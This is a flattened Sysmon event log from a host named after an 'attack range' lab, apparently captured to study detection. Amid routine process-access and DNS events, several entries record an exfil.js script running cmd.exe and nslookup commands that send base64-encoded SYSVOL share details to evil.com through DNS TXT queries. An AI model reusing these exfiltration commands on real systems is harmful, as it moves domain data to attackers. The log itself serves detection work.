14:21:40.764{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212033Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.764{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212032Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.764{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212031Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.764{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212030Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.764{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F4-629A-E244-000000005F02}5792C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212029Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.764{2E1864BB-18F4-629A-E044-000000005F02}73166176C:\Windows\system32\cmd.exe{2E1864BB-18F4-629A-E244-000000005F02}5792C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212028Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.777{2E1864BB-18F4-629A-E244-000000005F02}5792C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F4-629A-E044-000000005F02}7316C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltnrbp.tmp 2>&1 10341000x8000000000000000212027Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.748{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F4-629A-E144-000000005F02}5608C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212026Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.748{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F4-629A-E144-000000005F02}5608C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212025Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.748{2E1864BB-18F4-629A-E144-000000005F02}56084624C:\Windows\system32\conhost.exe{2E1864BB-18F4-629A-E044-000000005F02}7316C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212024Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.748{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F4-629A-E144-000000005F02}5608C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212023Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.733{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212022Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.733{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212021Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.733{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212020Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.733{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212019Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.733{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F4-629A-E044-000000005F02}7316C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212018Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.733{2E1864BB-18E0-629A-6742-000000005F02}39767484C:\Windows\System32\WScript.exe{2E1864BB-18F4-629A-E044-000000005F02}7316C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212017Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.744{2E1864BB-18F4-629A-E044-000000005F02}7316C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltnrbp.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000212016Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.733{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlamogx.tmpMD5=D1A54A6F21A90F6B3FDD9CFE56E9C930,SHA256=5C5F1828A4B86FD4EE344674F6FC0762ED42C1A295A6FDEB230A8253C2750995,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000212015Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.701{2E1864BB-18F4-629A-DE44-000000005F02}72641804C:\Windows\system32\conhost.exe{2E1864BB-18F4-629A-DF44-000000005F02}3192C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212014Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.701{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212013Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.701{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212012Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.701{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212011Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.701{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212010Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.701{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F4-629A-DF44-000000005F02}3192C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212009Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.701{2E1864BB-18F4-629A-DD44-000000005F02}79961960C:\Windows\system32\cmd.exe{2E1864BB-18F4-629A-DF44-000000005F02}3192C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212008Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.711{2E1864BB-18F4-629A-DF44-000000005F02}3192C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F4-629A-DD44-000000005F02}7996C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlamogx.tmp 2>&1 10341000x8000000000000000212007Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.686{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F4-629A-DE44-000000005F02}7264C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212006Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.686{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F4-629A-DE44-000000005F02}7264C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000212005Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.287{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50963- 354300x8000000000000000212004Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.287{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50962- 354300x8000000000000000212003Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.286{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50961- 354300x8000000000000000212002Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.213{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50960- 354300x8000000000000000212001Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.213{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50959- 354300x8000000000000000212000Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.212{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50958- 354300x8000000000000000211999Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.110{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50957- 